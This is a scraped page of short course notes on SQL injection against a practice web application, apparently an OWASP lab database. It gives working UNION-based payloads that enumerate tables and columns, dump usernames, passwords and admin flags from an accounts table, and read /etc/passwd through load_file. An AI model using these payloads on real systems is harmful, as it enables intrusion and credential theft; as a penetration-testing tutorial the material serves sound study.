SQL INJECTION

Discovering SQLi in GET

Inject by browser URL.

Selecting Data From Database

Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column.

Using “union select 1,2,3,4,5” to find the right column.

Then replace it with the information we want to get. (database, user, version)

Finding Database Tables

union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'

Extracting Sensitive Data Such As Passwords.

union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'

union select 1,username,password,is_admin,5 from accounts

Reading Files

union select null,load_file('/etc/passwd'),null,null,null

Writing Files

Ethical Hacking - Web Penetration Testing(9)的更多相关文章

  1. Ethical Hacking - Web Penetration Testing(13)

    OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to ...

  2. Ethical Hacking - Web Penetration Testing(8)

    SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...

  3. Ethical Hacking - Web Penetration Testing(10)

    SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...

  4. Ethical Hacking - Web Penetration Testing(6)

    REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ...

  5. Ethical Hacking - Web Penetration Testing(1)

    How to hack a website? An application installed on a computer. ->web application pen-testing A co ...

  6. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  7. Python Ethical Hacking - WEB PENETRATION TESTING(2)

     CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories ...

  8. Ethical Hacking - Web Penetration Testing(12)

    XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page ...

  9. Ethical Hacking - Web Penetration Testing(11)

    SQL INJECTION Preventing SQLi Filters can be bypassed. Use a blacklist of commands? Still can be byp ...

随机推荐

  1. c++ UDP套接字客服端代码示范

    c++ UDP套接字客服端代码示范 #include<winsock2.h> //包含头文件 #include<stdio.h> #include<windows.h&g ...

  2. 在执行jar包时如何使用调优参数

    [本文版权归微信公众号"代码艺术"(ID:onblog)所有,若是转载请务必保留本段原创声明,违者必究.若是文章有不足之处,欢迎关注微信公众号私信与我进行交流!] 使用时去掉换行 ...

  3. oracle包package的使用

    创建包 包头: CREATE OR REPLACE PACKAGE test_pkg IS PROCEDURE update_sal(e_name VARCHAR2,newsal NUMBER);  ...

  4. 设计模式:JDK和Spring中常见的设计模式

    设计模式 总结 类 工厂模式 封装创建过程,只对结果负责 BeanFactory.Calender 单例模式 全局唯一 ApplicationContext.Calender 原型模式 多重影分身之术 ...

  5. 如何修改linux下tomcat指定的jdk路径

    一般情况下,一台服务器只跑一个项目,只需根据所需项目,将linux默认的jdk环境配置好即可.某些时候一台服务器上会跑多个项目,而且各个项目需要的JDK版本各不相同,或者为了使业务独立开来,需要指定T ...

  6. Code Walkthroughs DataStream API

    上级:https://www.cnblogs.com/hackerxiaoyon/p/12747387.html DataStream API DataStreamApi 提供了健壮,有状态的流应用, ...

  7. Python3-算法-递归

    递归 递归算法是指一般通过函数或子进程来实现,在函数或子进程的内部,直接或间接地调用自己的算法,说白了就是自己调自己 注: 1.在使用递归的时候,必须要有一个递归出口,即一个明确的结束条件,否则就是死 ...

  8. 报错 500 - Request processing failed; nested exception is com.alibaba.dubbo.rpc.RpcException的解决放案

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明.本文链接:https://blog.csdn.net/loveliness_peri/artic ...

  9. CSS中那些必须掌握的概念

    一.盒子模型 1.什么是盒子模型 css盒模型本质上是一个盒子,封装周围的html元素,它包括:外边距(margin).边框(border).内边距(padding).实际内容(content)四个属 ...

  10. nginx配置奇怪问题记录

    执行  nginx -t  检查配置报了如下错误: 下面是配置信息 遇到个很奇怪的问题,plm-api-stage 这么配置就可以正常校验过,但是改成 plm-stage-api,就会上面的警告信息: ...